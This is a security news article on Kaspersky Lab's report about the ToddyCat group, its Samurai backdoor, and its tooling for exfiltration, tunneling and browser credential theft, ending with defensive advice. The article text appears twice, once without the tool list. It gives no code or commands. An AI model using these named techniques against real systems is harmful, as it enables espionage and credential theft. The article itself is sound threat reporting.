The Samurai backdoor does not leave victims with the slightest chance of data security.
Experts from Kaspersky Lab have discovered that the hacking group ToddyCat uses a wide range of tools to preserve access to compromised systems and steal valuable data. The group, which has been active since December 2020, specializes in attacks mainly on government and defense organizations in the Asia-Pacific region.
The main hacking tool is the passive Samurai backdoor, which allows you to remotely manage infected hosts. According to researchers Andrey Gunkin, Alexander Fedotov, and Natalia Shornikova, to collect data from a large number of hosts, hackers have automated the process as much as possible, using several alternative ways to continuously access and monitor systems.
In addition to the Samurai malware, ToddyCat also implements additional data exfiltration tools, such as LoFiSe and Pcexter, for collecting data and uploading archived files to Microsoft OneDrive. Additional programs include data tunneling using various software:
These tools allow you to maintain multiple simultaneous connections to infected endpoints and controlled infrastructure, which serves as a backup mechanism for preserving access if one of the channels is detected.
Kaspersky Lab warns that to protect the infrastructure of organizations, it is necessary to add the resources and IP addresses of cloud services that provide traffic tunneling to the firewall block list. It is also recommended not to save passwords in browsers to prevent hackers from accessing sensitive information.
Experts from Kaspersky Lab have discovered that the hacking group ToddyCat uses a wide range of tools to preserve access to compromised systems and steal valuable data. The group, which has been active since December 2020, specializes in attacks mainly on government and defense organizations in the Asia-Pacific region.
The main hacking tool is the passive Samurai backdoor, which allows you to remotely manage infected hosts. According to researchers Andrey Gunkin, Alexander Fedotov, and Natalia Shornikova, to collect data from a large number of hosts, hackers have automated the process as much as possible, using several alternative ways to continuously access and monitor systems.
In addition to the Samurai malware, ToddyCat also implements additional data exfiltration tools, such as LoFiSe and Pcexter, for collecting data and uploading archived files to Microsoft OneDrive. Additional programs include data tunneling using various software:
- Reverse SSH tunnel using OpenSSH;
- SoftEther VPN disguised as harmless files, such as "boot.exe", "mstime.exe", "netscan.exe" and "kaspersky.exe";
- Ngrok and Krong for encryption and redirection of traffic management and control;
- FRP, a Golang-based fast reverse proxy client;
- Cuthead, an executable file .NET to search for documents by extension, name, or modification date;
- WAExp, the program .NET for capturing data from the WhatsApp web app and storing it in an archive;
- TomBerBil for extracting cookies and credentials from web browsers, including Google Chrome and Microsoft Edge.
These tools allow you to maintain multiple simultaneous connections to infected endpoints and controlled infrastructure, which serves as a backup mechanism for preserving access if one of the channels is detected.
Kaspersky Lab warns that to protect the infrastructure of organizations, it is necessary to add the resources and IP addresses of cloud services that provide traffic tunneling to the firewall block list. It is also recommended not to save passwords in browsers to prevent hackers from accessing sensitive information.
